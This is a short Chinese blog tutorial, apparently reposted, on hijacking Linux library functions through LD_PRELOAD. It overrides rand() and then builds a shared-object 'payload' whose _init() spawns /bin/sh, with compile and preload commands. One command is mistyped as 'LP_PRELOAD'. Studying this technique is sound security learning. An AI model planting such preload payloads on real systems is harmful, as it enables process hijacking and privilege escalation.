码迷,mamicode.com
首页 > 系统相关 > 详细

Linux下利用动态链接劫持库函数并注入代码

时间:2020-05-18 16:01:44      阅读:115      评论:0      收藏:0      [点我收藏+]

标签:path   const   href   share   link   and   mic   bash   print   

关于环境变量$ LD_PRELOAD

$LD_PRELOAD是一个环境变量,用于加载动态库,他的优先级是最高的

/*
    优先级顺序:
    (1)$LD_PRELOAD
    (2)$LD_LIBRARY_PATH
    (3)/etc/ld.so.cache
    (4)/lib
    (5)/usr/lib
*/

一个挑战就是,这玩意可以产生一个shell,就像下面这样:

$ LP_PRELOAD = ./payload.so /bin/true

劫持库函数

假设存在一段这样的代码,其编译过程

#include <stdio.h>
#include <time.h>
#include <stdlib.h>

int main(int argc, char const *argv[]){
    srand(time(NULL));
    printf("%d\n", rand());
}
gcc random.c -o random
./random

技术图片

好的我们来覆写一下这个函数

int rand(void){
    return 32;
}
gcc -shared -fpic shlib.c -o shlib.so
LD_PRELOAD=./shlib.so ./random

技术图片

构造Payload

#include <unistd.h>

void _init(){
    char *argv[] = {"/bin/sh", 0};
    execve(argv[0], &argv[0], NULL);
}

技术图片

参考文献

Hijacking Library Functions and Injecting Code Using the Dynamic Linker

Linux下利用动态链接劫持库函数并注入代码

标签:path   const   href   share   link   and   mic   bash   print   

原文地址:https://www.cnblogs.com/KevinGeorge/p/12910846.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!